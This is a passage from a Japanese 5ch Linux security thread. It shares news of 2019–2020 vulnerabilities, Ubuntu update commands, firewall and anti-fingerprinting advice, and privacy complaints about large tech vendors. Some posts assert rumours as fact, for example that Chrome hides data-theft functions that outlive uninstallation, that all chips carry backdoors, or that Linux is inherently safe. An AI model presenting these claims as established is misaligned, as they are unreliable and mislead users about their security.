[0108 login:Penguin 2019/06/18(火) 17:26:10.39 ID:6P/bvjY8]

Netflix報告： Linux Kernel又はFreeBSDのリモートから攻撃可能な脆弱性(TCP SACK
PANIC) (CVE-2019-11477, CVE-2019-11478, CVE-2019-11479, CVE-2019-5599)
2019年6月18日 05:11　Kazuki Omo
https://security.sios.com/vulnerability/misc-security-vulnerability-20190618.html

こんにちは。SIOS OSSエバンジェリスト/セキュリティ担当の面 和毅です。

06/17/2019にNetflixからFreeBSDとLinux Kernelに対して、幾つかのTCPの脆弱性に関する
アドバイザリーが出されました(CVE-2019-11477, CVE-2019-11478, CVE-2019-11479,
CVE-2019-5599)。アドバイザリーは最小セグメントサイズ(MSS)とTCP SACKに関するものに
なります。最も深刻な「SACK Panic」と呼ばれるものは、最近のLinux Kernelにリモート
からKernel Panicを引き起こすことができます。Netflixの方でPatchも提供されています。
今後も情報が出てくると思われますので、こちらで取り上げます。

逐次情報は更新していく予定です。

[0109 login:Penguin 2019/06/22(土) 09:34:44.67 ID:BWxAJ8Sj]

>>108に関連して、アップデートが大量に来ている。

また、
◆snapアプリのアップデートはaptコマンドでは不可能である。

初心者向けに、Ubuntuを例にセキュリティーアップデートの手順を示す。（Kubuntu、Xubuntu、LubuntuなどのUbuntuフレーバーたちも同じ）

（１）ターミナルを開き、下記のコマンドを打ち、最新情報を取得する。

$ sudo apt update

（２）最新の情報が取得され、システムは最新ですとの表示が出たら（４）に飛ぶ。もし、アップデートの必要のあるパッケージがあることが示されたら、次のコマンドを打ち、パッケージをダウンロードしてインストールする。

$ sudo apt -y upgrade

ちなみに「-y」オプションは付けても付けなくても良いが、付けなかった場合には、インストール直後に本当にインストールして良いを［Y/N］と表示して確認してくる。この場合はYesを意味するYを押すことでインストールが始まる。
「-y」オプションを付けるとこの手順が飛ばされてダウンロードが完了次第、すぐにインストールが開始される。

（３）次の２つのコマンドは、それぞれ上記のコマンド実行の結果として、不要となった古いパッケージ、不要となったキャッシュを削除する。掃除であるから実行はたまにで良いが、ストレージ容量が少ない環境の人は頻繁にやるべきだろう。

$ sudo apt autoremove

$ sudo apt autoclean

（４）次にsnapアプリの更新を行う。

$ sudo snap refresh

snapアプリをインストールした覚えが無くとも、システムがsnapを使っているため必ず実行すること。例えばGNOMEシェルはsnapであり、Ubuntu18.04.x LTSはすでに更新の必要が出ているので、未実行であれば直ぐに実行し最新版にしよう。

GUIからはすべてのアップデートや掃除はできない。取り分けsnapは（４）の手動アップデートでなければ更新できない。
出来るだけ毎日、しっかりアップデートを行い、セキュアなLinuxライフを送ろう。

[0110 login:Penguin 2019/07/03(水) 23:55:13.69 ID:OptOlEBI]

>>1
Linuxなんて使わない。


以上。

[0111 login:Penguin 2019/09/29(日) 21:20:57.29 ID:Nip3Jzi1]

　彡⌒ミ
　（,,・_・）.｡ｏＯ（ 毛深くなりたい・・・ )
ヾ(,_ｕｕﾉ

[0112 login:Penguin 2019/10/13(日) 01:09:29.50 ID:ueikBXbu]

Google､Androidアプリでアップデートを各ユーザーに強制する方法を発表 | TechCrunch Japan
https://jp.techcrunch.com/2019/05/08/2019-05-07-android-developers-can-now-force-app-updates/

[0113 login:Penguin 2019/10/25(金) 00:20:33.72 ID:j4GkuklA]

>>6
それ違う
負けないためには、だね

コモドでいいよな？

[0114 login:Penguin 2019/12/12(木) 00:50:01.16 ID:jaG34Ck9]

IntelのCPUに脆弱性 [402859164]
https://leia.5ch.net/test/read.cgi/poverty/1576065630/

供給電圧を変化させてプロセッサを攻撃する新ハッキング手法「プランダーボルト」が発見される | TechCrunch Japan
https://jp.techcrunch.com/2019/12/11/2019-12-10-plundervolt-attack-breaches-chip-security-with-a-shock-to-the-system/
Plundervolt
https://plundervolt.com/


17 名前：番組の途中ですがアフィサイトへの転載は禁止です (ﾜｯﾁｮｲWW 2bc5-3D6L)[sage] 投稿日：2019/12/11(水) 21:19:15.97 ID:x8hKACYL0
電圧変えて何すんのよ
システムダウン？

19 名前：番組の途中ですがアフィサイトへの転載は禁止です (ﾌﾞｰｲﾓ MM39-B8XO)[sage] 投稿日：2019/12/11(水) 21:24:40.54 ID:/b3E3oTYM
>>17
プロセッサ内で隠蔽されている暗号鍵を取得する。Blurayの暗号鍵もインテルの脆弱性で割れた

26 名前：番組の途中ですがアフィサイトへの転載は禁止です (ｱｳｱｳｴｰ Sa13-MFI9)[sage] 投稿日：2019/12/11(水) 22:31:10.46 ID:g2xDg2x0a
>>17
エラーが起きたと思って秘匿領域のデータをダンプするんだってさ

[0115 login:Penguin 2019/12/12(木) 02:35:29.36 ID:QpDguOY0]

Linuxだから安全です。

[0116 login:Penguin 2019/12/12(木) 19:43:32.89 ID:jaG34Ck9]

>>114続き

44 名前：番組の途中ですがアフィサイトへの転載は禁止です (ﾜｯﾁｮｲ 5720-kui+)[] 投稿日：2019/12/12(木) 00:45:08.31 ID:gd2ZuGmF0 [1/2]
>1>19>26
なにこれ？
PC起動してないとCPUコントロール出来ないよね？

もしかして､ハードディスク暗号化してるPCを起動して､
暗号化解除する前にこの脆弱性使うと暗号化解除出来ちゃうとか？

>プロセッサ内で隠蔽されている暗号鍵
>秘匿領域
ここに何が格納されてるのか分からん
スーパーハッカー解説お願いします｡

54 名前：番組の途中ですがアフィサイトへの転載は禁止です (ﾜｯﾁｮｲ e228-kui+)[] 投稿日：2019/12/12(木) 03:25:28.44 ID:QS0Nrunu0
>>44
ハードディスク暗号化してるPCを起動して､暗号化解除して使用してる最中に、
この脆弱性を使うとCPUが隠してた暗号鍵を見ることができる

63 名前：番組の途中ですがアフィサイトへの転載は禁止です (ｱｳｱｳｴｰ Sa3a-0Ppm)[sage] 投稿日：2019/12/12(木) 05:18:32.13 ID:nA2cuX1+a
>>51
電圧いじれる（管理者）権限があってもSGXでやり取りされてる内容が見られないってのがウリの機能なので
UHD-BDの暗号化解除機構に使われてるんやで

55 名前：番組の途中ですがアフィサイトへの転載は禁止です (ﾜｯﾁｮｲWW 5720-AQmm)[] 投稿日：2019/12/12(木) 03:55:03.70 ID:gd2ZuGmF0 [2/2]
>>54
それは結構やばいなあ
まあ、暗号化解除前では意味なさそうなのが救いだな
てか、cpuってハードディスクの暗号化解除後もcpu内に暗号を常時置いとくもんなの？

[0117 login:Penguin 2019/12/13(金) 19:09:08.80 ID:ESmGY9a7]

>>115
コアダンプしそう

[0118 login:Penguin 2019/12/13(金) 19:14:21.26 ID:ESmGY9a7]

Ubuntuアップデートしたらマイクロコード降ってきたけどこれかね
流石にそこまで早くないか

[0119 login:Penguin 2019/12/16(月) 00:27:12.94 ID:Oy6287lw]

MicrosoftがUbuntu用のDefender出すんだって？

[0120 login:Penguin 2019/12/16(月) 05:28:15.87 ID:AxOoqKNy]

LinuxサーバーはAzureしか選択肢が無くなったかもかも。

[0121 login:Penguin 2019/12/16(月) 06:38:47.87 ID:AxOoqKNy]

iOSもカバーしてるからAzureが本命かもしれないよ。
WSLがどうでも良いわけじゃないだろうけど。

[0122 login:Penguin 2019/12/16(月) 20:16:03.60 ID:F52Y2AF9]

>>119
MSの個人情報搾取に耐えかねてubuntuに逃げてきたのに
追いかけてくるってか...

[0123 login:Penguin 2019/12/17(火) 02:23:31.85 ID:eJqKdH1L]

>>122
MSってそんな個人情報抜いてるの？
Skypeで抜いてるのにはびびったが｡
あれはそこそこ信用してただけにびっくりした｡
Skypeごときの情報抜かないだろうって思ってた｡

MSってGoogle並みに個人情報抜いてるの？
Googleは怖くて使えんわ
あんなの住所氏名電話番号全部バレてるだろ

[0124 login:Penguin 2019/12/17(火) 03:54:51.93 ID:+GuS9PLu]

くこの板の一部の信者はMSに親を殺された！とかわめいてるけど、実はgoogleの方がヤバいっていうね

[0125 login:Penguin 2019/12/17(火) 07:05:33.11 ID:BN1fWjc1]

ユーザーはキンタマ握られてるから誰も言わないだけで一番ヤバいのはApple

[0126 login:Penguin 2019/12/17(火) 10:14:03.65 ID:d36jgmOT]

最近はWindowsのアカウント作る時にできるだけMSアカウントを
作らせるよう誘導してくるな
Win8あたりからだった記憶があるけど、Win10が大型アップデート
するたびにどんどん露骨になってる印象

[0127 login:Penguin 2019/12/17(火) 10:37:04.71 ID:h64x6iyX]

たしかに。

[0128 login:Penguin 2019/12/17(火) 21:04:10.21 ID:IhVBQ6dn]

OS以外のファイルはゴッソリ抜かれてるのに
Windows10とかOffice365とか無思慮に まして仕事で使ってるヤツの気が知れんわ

[0129 login:Penguin 2019/12/17(火) 21:15:21.09 ID:486GIvh4]

チョロメや考えなしに派生したクロを入れるのも
泥棒の手を引いて家ん中案内するようなもんだしね

[0130 login:Penguin 2019/12/18(水) 13:16:10.19 ID:b8AkMopr]

どれ使うのがええのん？
opensuseとfirefox？

[0131 login:Penguin 2019/12/18(水) 20:51:19.26 ID:ng+ewP2B]

俺はwinの時sandboxie上でcookieや履歴の設定をユルユルにしたfirefox使ってweb見終わったら丸消ししてたんだが
ubuntuにしてからは気軽に使えるsandboxが見当たらないんで仮想マシンにZorin LiteとFirefoxだけ入れてzipして
やはりweb見終わったら仮想マシン丸消しして その都度zipから戻してる
多少手間だが これならいくらcookieやcanvas喰おうが いつもキレーなブラウザでインターネッツできると思ったんだけどね
砂箱スレでdockerもススメられたけど dockerはなんか違うかな？と思ったわ

[0132 login:Penguin 2019/12/18(水) 23:21:12.25 ID:Ghj3q23V]

【緊急警告】Google Chrome、Windows PC上の事実上全てのファイルを恒常的にスキャン
https://hayabusa9.5ch.net/test/read.cgi/news/1522897669/

[0133 login:Penguin 2019/12/19(木) 13:08:27.51 ID:eQXTO88z]

>>130
firefoxに余計な機能をブロックするuser.jsを育てたものを使ってる
デフォルトだとGの手が伸びてるし（safebrowsing）、テレメトリその他有効になってる…
GNUのicecat（firefox系）も良い感じ

>>131
firejail --private=<専用の一時ホームディレクトリ>　とか？
canvasは個別に対応が必要だと思う

[0134 login:Penguin 2019/12/19(木) 15:29:49.65 ID:hhS7ytBr]

>>133
user.jsは一時期手を出してみたけど「これワザとやってんじゃないの？」っていうくらい あの設定ワードって言うの？
about:configで左側に表示されるワードが 余りに頻繁に変更されるんで 根負けしてバンザイしたわ

＞canvasは個別に対応が必要だと思う
とりまCanvasBlock入れてるけどOPTIONは内容が意味フで何言ってるかわかんないから手がつけられないでいるわ
やっぱ色々と設定いじった方がいいもんなの？

[0135 login:Penguin 2019/12/20(金) 02:13:31.46 ID:3v00n4yQ]

operaやvivaldiはどんな評価やろ

[0136 login:Penguin 2019/12/20(金) 08:11:46.30 ID:W5p7NQnV]

GoogleがChromeやFirefox以外のブラウザを弾くようになって無理

[0137 login:Penguin 2019/12/20(金) 20:28:03.18 ID:BMpjrsOC]

つ参考

Browser Fingerprinting対策ツールの評価(pdf)
https://ipsj.ixsq.nii.ac.jp/ej/?action=repository_uri&;item_id=187815&file_id=1&file_no=1

Web Browser Fingerprint解説ページ
https://www.saitolab.org/fp_site/

[0138 login:Penguin 2019/12/21(土) 16:40:49.62 ID:P2W6B/wx]

まじで教えてチョメ　クロ　危ないんですか？
火狐は大丈夫なら　前２者は早速削除したいと思います。

[0139 login:Penguin 2019/12/21(土) 16:56:46.98 ID:P2W6B/wx]

Sicklylifeさんはファイアーウオールは有効にしなくてもよい
とありますので、設定していませんが、入れれば幾らかでも
安全になるのでしょうか

[0140 login:Penguin 2019/12/21(土) 20:37:04.76 ID:8u1F/kP3]

>>138
Linux用ブラウザーを狙う奴なんていないから心配すんな。
あ、ブラウザー拡張機能は別な。拡張機能はOS問わずヤバいものがあるかもしれん。

>>139
例えばUbuntu新規インストしてupdate、dist-upgrade、rebootした後、
すぐにgufw入れてファイアーウォール有効にしても意味ないでしょ。
よく分かんないなら、とりあえずファイアーウォールは有効にしとけば？

[0141 login:Penguin 2019/12/21(土) 21:33:25.68 ID:2yt7G6Gl]

>>138
チョロメが個人情報泥棒ブラウザなのは周知の事実
何年か前からwin10にタメ張ってかなり大規模に盗みやってるらしいゾ
Win版のチョロはアンインストールしても 泥棒機能はOSの深いトコで生き続けるらしいから
もし無しにしたいのならOSの入れ直ししかねーんじゃね？
そんでせっかく金使って開発した泥棒機能をLinux版には入れていないなんて甘い見通しは無いと思うが？
ゴキグルから見たらwinユーザーもLinuxユーザーも同じ金だろうに
クロムもソースからゴキグルと通信する部分を削除していないのはアウトだと思っていーんじゃね？

[0142 login:Penguin 2019/12/22(日) 05:32:17.57 ID:F7RmFDTN]

>>139
セキュリティは上がる、とは言える
最初はgufw,慣れればiptablesがおすすめ（FWというかネットワークの詳細なコントロールが出来る）

例えばFW無しだと、WANインターフェイスか0.0.0.0でリッスン中のプロセスがあれば外から繋がる
これが設定ミスや脆弱性から悪用に発展する可能性、どんなプログラムを走らせてるのかバレる、DOSの可能性
ルーターの内側に居ればベーシックなFWの内側に居るのに近いけど、アプリがUPnPで勝手にルーターでポートを開ける事も無理じゃない
LAN内の相手からは普通に繋がるし、必ずしもルーターの内側にいるのか？リッスン中のアプリに設定ミスや脆弱性は無いのか？
FWはそういう可能性をカット出来る（公開する意図のない宛先には）

不要なアタックサーフェイスは狭めるのがセキュリティの基本

[0143 login:Penguin 2019/12/22(日) 10:24:37.91 ID:QiAxui6d]

小手先だけで、基礎の教養なしにubuntu を使っている小生には
ほとんど判りませんが、兎に角拡張機能は避ける、fireWallは有効にしてみました、
ご教示有難う存じました。

[0144 login:Penguin 2019/12/23(月) 03:58:31.72 ID:fOOPeHWr]

>>134-135
Canvasってなんだっけ？
CanvasってJavaScriptオフだと機能しないよね？
俺の勘違い？

[0145 login:Penguin 2019/12/23(月) 04:06:22.21 ID:fOOPeHWr]

Ubuntu18.04使用でブラウザはFirefox､Torbrowserしか入れてないわ
Chromeは論外で他に選択しないからこの2つ以外入れてない

Torスレでもなんか話題になってたけど､
普通のブラウジングするのにTorbrowserのTor機能だけ切るのはどうなの？

TorBrowserもFirefox基盤だけど､
>>133の
＞デフォルトだとGの手が伸びてるし（safebrowsing）、テレメトリその他有効になってる…
にはなってないよね？
なにせTorBrowserだし･･･

[0146 login:Penguin 2019/12/23(月) 04:54:54.78 ID:fOOPeHWr]

>>131
＞ubuntuにしてからは気軽に使えるsandboxが見当たらないんで
＞仮想マシンにZorin LiteとFirefoxだけ入れてzipして
＞やはりweb見終わったら仮想マシン丸消しして その都度zipから戻してる

なんでこんなめんどくさいことしてるの？
普通にFirefoxの全履歴削除すれば全部消えるんじゃないの？
UbuntuのJournalに履歴とか残るから？

[0147 login:Penguin 2019/12/23(月) 10:49:30.08 ID:1IWvct7N]

iptablesはもう古いよ
これからはnftablesだよ

[0148 login:Penguin 2019/12/23(月) 12:05:01.09 ID:x1WXtyaO]

履歴ｗ

[0149 login:Penguin 2019/12/23(月) 17:23:14.88 ID:Y4WL5T53]

Oracle Linux の SELinux を disabled にしたら SSH で接続できなくなるのはなぜですか？

[0150 login:Penguin 2019/12/24(火) 11:41:20.66 ID:NeirOfqJ]

>>144
ここで言ってるのはfingerprinting技術
WEBにアクセスした時に、環境ごとにユニークな値を生成させて取得（同時にIPや他情報もなるべく取得）
その後IPを変えようがcookieやら消そうが同じようなユニークな値を取って紐付ければ特定に繋がる
ブラウザだとcanvas,audio,rectその他がフィンガープリントするのに使えるらしい
こんな追跡の仕方、技術の悪用に近いと思うけど…、色んな建前を使って取得＆追跡されるのが常だからな

JSを切ればcanvasでは取れないような…？他もかなり良くなる

>>145
利便性とのバランスもあるけど、プライバシー重視なら俺もTor切ったTorBrowserは手っ取り早いと思う
プロ？集団がプライバシー重視でアンチフィンガープリンティングにも力を入れて設定＆開発したんだ
公式でTor無しバージョンもリリースすれば良いのに
もちろんGやテレメトリその他色々無効になってる（about:configで確認出来る）

[0151 login:Penguin 2020/01/28(火) 22:15:11.09 ID:zrSY3ZQs]

無料ウイルス対策ソフトのアバストAvast、おまえらのネット閲覧データを販売か？ [594632409]
https://leia.5ch.net/test/read.cgi/poverty/1580177900/


無料ウイルス対策ソフトのアバスト、ユーザーのウェブ閲覧データを販売か
Carrie Mihalcik （CNET News） 翻訳校正： 編集部2020年01月28日 11時07分
ウィルス対策ソフトウェアメーカーAvastが、Jumpshotという子会社を通して「機密性の高い」ウェブ閲覧データを販売していると報じられている。
https://japan.cnet.com/article/35148566/

[0152 login:Penguin 2020/01/28(火) 22:26:23.57 ID:msT/XQYC]

Linuxに関係あるんか？

[0153 login:Penguin 2020/01/28(火) 22:30:53.29 ID:meBmn7jU]

やはり、営利企業がリリースするウィルス対策ソフトには、
用心したほうがいいんでしょう。そもそもなにゆえ無料なのか…

avast は Linux用もあるからね。

[0154 login:Penguin 2020/01/28(火) 22:39:50.10 ID:msT/XQYC]

Linux版も無料なのか？

[0155 login:Penguin 2020/01/28(火) 22:49:55.26 ID:meBmn7jU]

>>154
今は知らんけど、過去にはあった。

[0156 login:Penguin 2020/01/28(火) 22:52:43.99 ID:meBmn7jU]

CNET News 翻訳記事の中には、
「ユーザーのプライバシーと、当社の主力セキュリティ製品で必要なデータ利用とのバランスをとる責任」があることを理解し、重くとらえていると述べている。
と、こんな記事があるのね。これはGoogleの利用許諾とよく似ているねえ。
やはり、ビッグデータを収集したいわけだ。そうじゃなきゃ、無料はおかしい。

[0157 login:Penguin 2020/01/28(火) 22:58:30.86 ID:msT/XQYC]

>>155
今はないとしたらほぼ影響はないか

[0158 login:Penguin 2020/01/28(火) 23:02:40.66 ID:meBmn7jU]

>>157
今ないのかどうかは知らないし、avast サイトをのぞきたくはないし。

[0159 login:Penguin 2020/01/28(火) 23:07:56.07 ID:msT/XQYC]

>>158
検索するくらいは出来るでしょ
なさそうだけど

[0160 login:Penguin 2020/01/28(火) 23:09:01.59 ID:YOaQ6DqC]

数年前に中華資本になったんだっけ？

[0161 login:Penguin 2020/01/28(火) 23:10:35.37 ID:meBmn7jU]

avast とは関わりたくないから。

[0162 login:Penguin 2020/01/28(火) 23:14:54.44 ID:msT/XQYC]

別に責めてるわけじゃないからね
ただ話膨らませるなら検索くらいしなよ

[0163 login:Penguin 2020/01/29(水) 00:38:40.10 ID:FX+veRBJ]

avastって中華になってたのかよw
ロシアと中華マジスゲエなあ

Linux関係ないけど､androidの中華作成のVirtual exposedってのも
ウイルスてんこ盛りらしいから気をつけてな

[0164 login:Penguin 2020/01/29(水) 08:40:01.61 ID:QKw1rI8u]

まじかよ
つい先日レノボの　Rayzen ノート買っちまったよ

[0165 login:Penguin 2020/01/29(水) 09:38:52.68 ID:d7wE0hb8]

>>164
レノボは中共製で知られているが、個人データを密かに送信してるんじゃないかと
かなり前に騒がれたが、今ではその話題は見かけないようになった。

[0166 login:Penguin 2020/01/29(水) 09:48:03.97 ID:d7wE0hb8]

>>162
じゃ、話しを膨らませてあげるよ。
皆さん、結構関心あったと思うけど。何人も、avast 使ってウイルス対策していたよ。
このソフトは、無料なのに使いやすかったからなあ。

[0167 login:Penguin 2020/01/29(水) 09:51:50.83 ID:d7wE0hb8]

アンチウイルス avast! Linux Home Edition
https://mao.5ch.net/test/read.cgi/linux/1186329249/

この過去スレ、おもしろいよ。好奇心があるなら是非。

[0168 login:Penguin 2020/02/14(金) 02:20:37.02 ID:c0Qe/FjT]

avastはチェコだろ
avastが情報売買してるんなら買収したAVGもしてるんだろうな

[0169 login:Penguin 2020/02/14(金) 16:38:25.68 ID:gX1pOkts]

>>166
日本語が不自由なようだな
検索をしろって話
話を膨らませろってことじゃない

[0170 login:Penguin 2020/03/05(木) 01:34:35.51 ID:G4vFpVY+]

【セキュリティ】スマホ、ＰＣのバージョン更新をサボっている人は要注意！　世界１０億台以上のデバイスに深刻な脆弱性が見つかる
https://asahi.5ch.net/test/read.cgi/newsplus/1583331541/

●Kr00kの影響を受けるデバイスは10億台以上！
「Kr00k（CVE-2019-15126）」と名付けられたこの脆弱性は、
多くのクライアントデバイスが採用するBroadcomおよびCypressのWi-Fiチップに存在。
脆弱性を解消するためのパッチの適用が必要となるデバイスの総数は、実に10億を超えているとみられる。
https://headlines.yahoo.co.jp/article?a=20200304-00010000-finders-bus_all

[0171 login:Penguin 2020/03/05(木) 09:18:22.77 ID:A5krwWfW]

BroadcomもCypressも使ってないから無問題

[0172 login:Penguin 2020/03/06(金) 07:58:55.74 ID:sgw3Rl5z]

>>170
ドザざまあｗｗｗ
Linux使ってた俺ら大勝利！

[0173 login:Penguin 2020/03/07(土) 01:08:45.63 ID:m3qf4p2x]

もう全チップにバックドア埋め込まれてるとみといていいよ

重大なAndroidセキュリティリスクが確認され、数百万台のデバイスを「ルート化」できる-可能な場合は今すぐ更新
https://www.forbes.com/sites/daveywinder/2020/03/04/critical-android-security-risk-confirmed-millions-of-devices-can-be-rooted---update-now-if-you-can/amp/

エドワード・スノーデン (Edward Snowden) 総合スレ
https://mao.5ch.net/test/read.cgi/war/1376109425/

[0174 login:Penguin 2020/03/11(水) 06:58:14.09 ID:NC36v9Y3]

そのあたり懸念してReplicantOSってアンドロイドRomは機種限定してるんだよね。
WifiもAsix製チップ指定でUSBアダプタ経由で使う徹底ぶり。

[0175 login:Penguin 2020/03/12(木) 14:42:59.52 ID:yHbe8GdM]

これどうだろ？

【PC】マイクロソフト、Linux用のマルウェア対策ソフト「Microsoft Defender ATP for Linux」
https://egg.5ch.net/test/read.cgi/bizplus/1582619543/

[0176 login:Penguin 2020/03/12(木) 15:30:58.71 ID:AmodBQx2]

ええな

[0177 login:Penguin 2020/03/14(土) 23:23:23.75 ID:ndyfJBcC]

なんか仕込まれそうで怖ぇ

[0178 login:Penguin 2020/03/15(日) 19:44:45.62 ID:j8vnzYAm]

いまや個人情報売買で経営が成り立ってるマイクソがタダでモノ使わせてくれるわけないだろ？

[0179 login:Penguin 2020/03/16(月) 02:00:31.10 ID:6TJuwv7v]

オープンソースじゃねえのか

[0180 login:Penguin 2020/03/16(月) 20:44:24.70 ID:rhUEVfJP]

どーせはデータ受信部分にでも泥棒機能がついてて
データ更新するたびにファイル構成やら設定したファイルやら
金の匂いのしそうなモンをアレコレ持ち出されるんだろ？ｗ
これぞMSクオリティじゃないか

[0181 login:Penguin 2020/03/20(金) 16:39:40.19 ID:oDz6Qr3S]

>>23
>きちんと設定されてなかったり(互換性のせいで出来ない)、

SElinux有効にするとunboundが動かなくなるので無効にしてる
よりによってプライバシー対策で切れないソフト

[0182 login:Penguin 2020/04/12(日) 20:17:25.44 ID:FkqTAYd2]

【IT】AppleとGoogleが「新型コロナウイルス追跡システム」をiOSとAndroidに組み込む。
ttps://asahi.5ch.net/test/read.cgi/newsplus/1586681010/

AppleおよびGoogleが提唱する追跡システムは、BLEを用いて連絡先追跡ネットワークを構築し、互いに近接していたスマートフォンに関する大量のデータを保持します。
iOS・Android端末間の相互運用を可能にするAPIをリリースすると発表。
さらに、2020年5月以降にはAppleとGoogleがモバイルOSにも追跡ソリューションを組み込むことで、Bluetoothベースの追跡システムをより幅広い範囲で活用できるようにするとしています

https://gigazine.net/news/20200411-google-apple-coronavirus-tracing-system/

[0183 login:Penguin 2020/04/12(日) 21:29:22.20 ID:PVWMHMkl]

>>182
具体的に何を可能とするかという説明が一切ないね

[0184 login:Penguin 2020/04/12(日) 21:43:53.67 ID:PVWMHMkl]

これはプライバーの問題と係わってくるから
今でも、位置情報が記録されてる

[0185 login:Penguin 2020/04/12(日) 22:39:18.40 ID:mweIS90Z]

Googleが開発したのに「AppleとGoogleが」
ロゴすらApple左Google右という徹底ぶり。

[0186 login:Penguin 2020/04/12(日) 23:20:15.72 ID:wPD0Lny+]

アルファベット順だろ

[0187 login:Penguin 2020/04/13(月) 00:34:03.12 ID:i2WW3vba]

都合の良い時だけそう言うAppleメソッド。

作ったのはGoogleなのに、発表はアルファベット順にしろと言う。
だったらAlphabet/Goole Appleの順でなくちゃおかしいだろう

[0188 login:Penguin 2020/04/13(月) 04:30:40.00 ID:hG1t6L/h]

小学生の屁理屈

[0189 login:Penguin 2020/04/22(水) 17:14:26.52 ID:kCvg5qbo]

【スマホ】ＫＤＤＩ スマホ位置情報 都道府県などに無償提供 新型コロナ
https://asahi.5ch.net/test/read.cgi/newsplus/1587540713/

新型コロナウイルスの感染拡大防止に役立ててもらおうと、
auのKDDIは、スマートフォンの位置情報などのデータをプライバシーを保護したうえで
全国の都道府県などに無償で提供することを決めました。
ヤフーもこうしたデータの提供を始めていて、
大手企業が持つデータの活用がどこまで進むか注目されます。
https://www3.nhk.or.jp/news/html/20200422/k10012400501000.html

[0190 login:Penguin 2020/05/01(金) 20:04:06.99 ID:Or87f1Mo]

【中国】Xiaomiのスマートフォン アリババに端末の行動記録を無断で送信か シークレットモードでもアウト Xiaomi「嘘だ！」 [ガーディス★]
https://asahi.5ch.net/test/read.cgi/newsplus/1588330336/

Xiaomiのスマートフォン「Xiaomi Redmi Note 8」が、端末上で行われたユーザーのほとんどの行動を記録し、アリババのサーバーに送っていることを、セキュリティ研究者のGabriel Cirlig氏が発見しました。
https://uk.pcmag.com/smartphones/126774/report-xiaomi-phones-scooping-up-tons-of-web-browsing-data-even-in-incognito-mode
https://news.livedoor.com/lite/article_detail/18202655/
..

[0191 login:Penguin 2020/05/08(金) 23:30:53.21 ID:PgEvz8/n]

カスペルスキーがAndroid標的のスパイウェア「PhantomLance」の調査結果を公開、東南アジアを中心に活動


攻撃活動はベトナムに拠点を置くとみられるAPT（Advanced Persistent Threat）攻撃グループ「OceanLotus」によるものとみられ、
2019年7月にロシアのセキュリティベンダーであるDoctor Webが発見した。
なお、APT攻撃グループとは、国家組織からの指示と支援を受け、高度で持続的な脅威を実行するグループを指す。

不正アプリの主な目的はインストールしたデバイスのさまざまな情報を収集することで、
位置情報や通話ログ、連絡先、SMSのほか、インストールしているアプリのリストやAndroidデバイスのモデル、
OSのバージョンといったデバイス情報を収集しているという。
https://k-tai.watch.impress.co.jp/docs/news/1251/305/amp.index.html


最初に引っ掛らなかったのはこういうカラクリが『アプリのアップデートを配信することによって、
悪意ある機能が追加された』：PhantomLanceのAndroid向けバックドア、Google Playで見つかる
https://itnews.org/news_resources/164747

[0192 login:Penguin 2020/05/14(木) 17:36:10.22 ID:GXzXpqxg]

【乞食速報】サイバー防御の教材、無料配布へ [158879285]
https://leia.5ch.net/test/read.cgi/poverty/1589443202/


実践的サイバー防御演習「CYDER」の教材を期間限定で一般公開
2020年5月12日

国立研究開発法人情報通信研究機構


国立研究開発法人情報通信研究機構（NICT、理事長: 徳田 英幸）ナショナルサイバートレーニングセンターは、当センターが推進する実践的サイバー防御演習「CYDER*」の周知啓発の取組の一環として、
本日、期間限定で過去の演習教材の一部の一般公開を開始しました。
ダウンロード方法やCYDERの詳細、最新情報等は、公式Webサイトにてご確認ください。

* CYDER（サイダー）: CYber Defense Exercise with Recurrence（サイバー防御反復演習）

CYDERでは、セキュリティインシデントが発生した際の対応手順や事前の備え等について学ぶことができます。
1 背景・趣旨
新型コロナウイルス感染症緊急事態宣言の発出を受け、日本国内の多くの組織において、在宅勤務等、通常と異なる形態での勤務を余儀なくされていますが、このような状況においても、サイバー攻撃の
脅威は続いています。サイバー攻撃への対策としては、ITシステムを利用する方々の基礎知識の習得やトレーニングが重要ですが、現在の社会情勢においては、十分な学習機会の確保が困難な状況と
なっています。
このような情勢下における緊急的な措置及びCYDERの周知啓発の取組の一環として、このたび、NICTは、サイバーセキュリティに関する技術や知識を必要とする方の学習の一助とすべく、CYDERの過去の
演習教材の一部を期間限定で一般公開することとしました。

[0193 login:Penguin 2020/05/14(木) 17:36:51.50 ID:GXzXpqxg]

2 CYDER教材の一般公開の概要
1) 提供内容: 過去の演習シナリオを課題単位で再構成した教材を提供
2) 提供方法: 以下のWebサイトで申請を受け付け、指定場所からダウンロードする形で提供
https://cyder.nict.go.jp/
3) 提供期間: 2020年5月12日（火）から当面の間（当機構の判断による）
4) 対象: 組織内において情報システムの管理に携わる方、その人材育成に関わる方、その他サイバー防御演習に関心のある方など
5) 費用: 無料

3 注意事項
1) 緊急事態宣言を受けた暫定的な対応として、期間限定での提供となります。そのため、状況の変化等に伴い、予告なく変更・終了する場合があります。
2) 学習者が興味のある課題を選択して学習できるよう、演習シナリオを課題単位に分割して提供します。
3) 今回は教材のみの配布のため、CYDERの大規模演習環境は利用できません。
4) 本教材の著作権は、国立研究開発法人情報通信研究機構に帰属します。商業上の利得や金銭報酬を目的とした営利目的の利用、及び、本教材の複製や改変、第三者への再配布を禁止します。

4 利用例
1) 外出が難しい状況下の在宅勤務等における学習教材
2) 組織内での研修用教材
3) 研修・教育を今後担当する方自身のトレーニング用教材

https://www.nict.go.jp/press/2020/05/12-1.html

[0194 login:Penguin 2020/06/09(火) 12:35:46.17 ID:bAdCtyAo]

32 名称未設定 2020/05/11(月) 19:15:04.07 ID:nz2/6FeH0
Unfixable Flaw Found in Thunderbolt Port that Unlocks any PC in Less Than 5 Minutes | TechPowerUp
https://www.techpowerup.com/266917/unfixable-flaw-found-in-thunderbolt-port-that-unlocks-any-pc-in-less-than-5-minutes

Thunderspy - When Lightning Strikes Thrice: Breaking Thunderbolt 3 Security
https://thunderspy.io/

deeplで翻訳
Thunderspyは、Thunderboltポートを持つデバイスをターゲットにしています。コンピュータにそのようなポートがある場合、
ドライブが暗号化されていて、コンピュータがロックされていたり、スリープ状態に設定されていたりしても、
そのポートに短時間で物理的にアクセスした攻撃者は、すべてのデータを読み取ってコピーすることができます。

Thunderspyはステルス機能を持っており、攻撃の痕跡を見つけることができません。つまり、フィッシングリンクや悪意のある
ハードウェアを使用して攻撃者に騙されることはありません。Thunderspy は、短時間の外出時にコンピュータをロックしたり
中断したりするなど、最善のセキュリティ対策を行っていても動作します。また、システム管理者がデバイスをセキュアブート、
強力な BIOS とオペレーティング・システム・アカウントのパスワードで設定し、ディスクの完全な暗号化を有効にしていた場合も動作します。
